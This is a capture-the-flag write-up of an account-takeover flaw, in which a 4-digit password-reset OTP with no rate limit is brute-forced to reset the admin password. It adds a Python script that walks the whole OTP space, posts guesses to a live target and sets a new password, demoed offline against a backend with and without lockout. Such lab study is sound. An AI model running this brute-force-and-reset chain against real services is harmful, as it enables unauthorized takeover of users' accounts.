Cheesy Does It (forgot_password flaw)
Level: Easy Points: 10 Type: Daily Challenge
On the register/login page there is a forgot-password feature.

Forgot-password takes only one argument, the username, and any existing username can be supplied here, including admin.

Once a username is submitted, an OTP is sent to that account's email address. The UI does not accept a value longer than 4 digits, so the OTP space is at most 10,000 values (0000 to 9999), which is small enough to brute-force.

There is no rate limiting or attempt lockout on OTP verification, so we can brute-force the OTP. After a successful OTP brute-force, the response contains a reset_token.

From the JS file we can see how the reset_token is used to change the password: a POST request to /api/verify-token with the values username, reset_token and new_password.

The password is changed successfully.
Now we can log in as admin and get the flag.
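The full chain described above (enumerate the 4-digit OTP space, brute-force it against an unthrottled verifier, then use the returned reset_token to set a new password via /api/verify-token) as an added example; this is not code from the original write-up or the challenge. The OTP verification endpoint name (/api/verify-otp) and the JSON field names for it are assumptions, since the write-up only names /api/verify-token. To keep it runnable offline it includes a constructed in-memory backend, once without any attempt limit (the flaw) and once with a lockout after a few wrong attempts, so the effect of the missing rate limit is visible:

```python
import json
import urllib.error
import urllib.request
from typing import Callable, Optional, Tuple


def otp_candidates():
    """Every value the 4-digit UI field can carry, zero-padded: 0000 .. 9999."""
    return (f"{i:04d}" for i in range(10_000))


def brute_force_otp(try_otp: Callable[[str], Optional[str]]) -> Optional[Tuple[str, str]]:
    """Try each candidate until the verifier hands back a reset token.

    try_otp(otp) must return the reset_token on success and None otherwise.
    Returns (otp, reset_token) or None if the whole space was exhausted.
    """
    for otp in otp_candidates():
        token = try_otp(otp)
        if token is not None:
            return otp, token
    return None


class FakeBackend:
    """Constructed stand-in for the challenge server's OTP check.

    max_attempts=None reproduces the flaw (no lockout); a small integer
    models the fix: after that many wrong guesses the OTP is invalidated.
    """

    def __init__(self, correct_otp: str, reset_token: str, max_attempts: Optional[int] = None):
        self.correct_otp = correct_otp
        self.reset_token = reset_token
        self.max_attempts = max_attempts
        self.attempts = 0
        self.locked = False

    def verify_otp(self, username: str, otp: str) -> Optional[str]:
        if self.locked:
            return None
        self.attempts += 1
        if otp == self.correct_otp:
            return self.reset_token
        if self.max_attempts is not None and self.attempts >= self.max_attempts:
            self.locked = True  # hardened behaviour: burn the OTP after too many failures
        return None


def _post_json(url: str, payload: dict) -> Optional[dict]:
    """POST a JSON body; None on any HTTP error (treated as 'wrong guess')."""
    req = urllib.request.Request(
        url,
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return json.load(resp)
    except urllib.error.HTTPError:
        return None


def make_http_submitter(base_url: str, username: str, endpoint: str = "/api/verify-otp"):
    """Build a try_otp callable against a live target (endpoint name is assumed)."""
    def try_otp(otp: str) -> Optional[str]:
        body = _post_json(base_url + endpoint, {"username": username, "otp": otp})
        return body.get("reset_token") if body else None
    return try_otp


def reset_password(base_url: str, username: str, reset_token: str, new_password: str) -> bool:
    """Final step from the write-up: POST /api/verify-token with the three fields."""
    body = _post_json(
        base_url + "/api/verify-token",
        {"username": username, "reset_token": reset_token, "new_password": new_password},
    )
    return body is not None


if __name__ == "__main__":
    # Offline demo against the constructed backend; swap in make_http_submitter(...) for a real target.
    weak = FakeBackend("4821", "tok-demo")
    print("no rate limit:", brute_force_otp(lambda o: weak.verify_otp("admin", o)), "after", weak.attempts, "attempts")
    strong = FakeBackend("4821", "tok-demo", max_attempts=5)
    print("with lockout: ", brute_force_otp(lambda o: strong.verify_otp("admin", o)), "after", strong.attempts, "attempts")
```

Against the unthrottled backend the loop walks the space in order and stops at the correct value; against the locked-down one every call after the fifth failure is rejected, so the attacker exhausts all 10,000 candidates and never sees a token. A real fix would also bind the attempt counter to the username and source, and expire the OTP after a short window.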
